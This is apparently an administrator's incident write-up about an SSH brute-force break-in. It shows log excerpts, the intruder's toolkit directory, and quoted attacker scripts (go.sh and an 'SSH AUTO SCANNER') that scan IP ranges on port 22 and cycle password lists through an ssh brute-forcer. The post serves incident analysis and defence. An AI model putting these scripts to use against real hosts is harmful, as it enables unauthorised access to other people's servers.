# ls -l /proc/3995/fd/
total 3
lrwx------ 1 neo neo 64 Oct 25 07:43 0 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 1 -> /dev/pts/1 (deleted)
lrwx------ 1 neo neo 64 Oct 25 07:43 2 -> /dev/pts/1 (deleted)

44571:Oct 20 19:17:08 faizkazi sshd[2972]: Accepted keyboard-interactive/pam for neo from 79.116.242.2 port 3106 ssh2
44572:Oct 20 19:17:08 faizkazi sshd[2986]: (pam_unix) session opened for user neo by (uid=0)

I could see this when I ran who:

faiz     pts/3        Nov 19 13:56 (p02a702.tokynt01.ap.so-net.ne.jp)
vasanth  pts/2        Nov 18 23:37 (86.123.17.188:S.0)

Looks like it never got beyond that, though I saw some hundreds of './ssh' processes running, which, after summarily killing off, I found and archived the offending scripts: These were stored and running off of the directory /var/tmp/vi.recover/irc/ as the user 'vasanth'. I suspect a weak password lead to a brute-force SSH break-in. Not at all a bother, but nothing that can't be fixed by an iptables '-m recent' filter.

var/
`-- tmp
    `-- vi.recover
        `-- irc
            |-- 1
            |-- 10
            |-- 11
            |-- 12
            |-- 13
            |-- 14
            |-- 15
            |-- 16
            |-- 17
            |-- 18
            |-- 19
            |-- 2
            |-- 20
            |-- 209.85.ps.22
            |-- 21
            |-- 22
            |-- 23
            |-- 24
            |-- 25
            |-- 26
            |-- 27
            |-- 28
            |-- 29
            |-- 3
            |-- 30
            |-- 31
            |-- 32
            |-- 33
            |-- 34
            |-- 35
            |-- 36
            |-- 37
            |-- 38
            |-- 39
            |-- 4
            |-- 40
            |-- 41
            |-- 42
            |-- 43
            |-- 44
            |-- 45
            |-- 46
            |-- 47
            |-- 48
            |-- 49
            |-- 5
            |-- 50
            |-- 51
            |-- 52
            |-- 53
            |-- 54
            |-- 55
            |-- 56
            |-- 57
            |-- 58
            |-- 59
            |-- 6
            |-- 60
            |-- 61
            |-- 62
            |-- 63
            |-- 64
            |-- 7
            |-- 8
            |-- 9
            |-- all
            |-- common
            |-- full
            |-- go.sh
            |-- mfu.txt
            |-- pass_file
            |-- ps
            |-- r00t
            |-- skan
            |-- ss
            |-- ssh
            `-- x

Some samples from the scripts: Note: though no harm can come if you try running these binaries as a non-root user (if you are running Linux, that is), it's probably a good idea not to run the scripts in this archive - there's no easy way to be sure what they actually do.

$ cat /var/tmp/vi.recover/irc/go.sh 
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > mfu.txt
./ssh-scan
rm -f bios.txt

#!/bin/bash

clear

rm -rf $1.ps.$2

echo "#=====#==================================#=====#"
echo "#= R =# SSH AUTO SCANNER BY REGELE & CO  #= R =#"
echo "#= E =#-------   #BlackCat TEAM   -------#= E =#"
echo "#= G =#----------------------------------#= G =#"
echo "#= E =# � ALL RIGHTS RESERVED TO Regele �#= E =#"
echo "#= L =#   Now Just Sit Back End Relax    #= L =#"
echo "#= E =#   IPs founder... ACTIVATING!!!   #= E =#"
echo "#Range from -> $1.0.0"
echo "#Range   to -> $1.255.255"
echo "#Looking on -> PORT $2"

./ps $1 $2

sleep 5

cat $1.ps.$2 |sort |uniq > mfu.txt

oopsnr2=`grep -c . mfu.txt`

sleep 5
echo "#---Relax ... Take it Easy---#"

cat 1 > pass_file
sleep 3
./ssh 150

cat 2 > pass_file
sleep 3
./ssh 150

#... and so on

echo "# It's over, you cand go outside and play now #"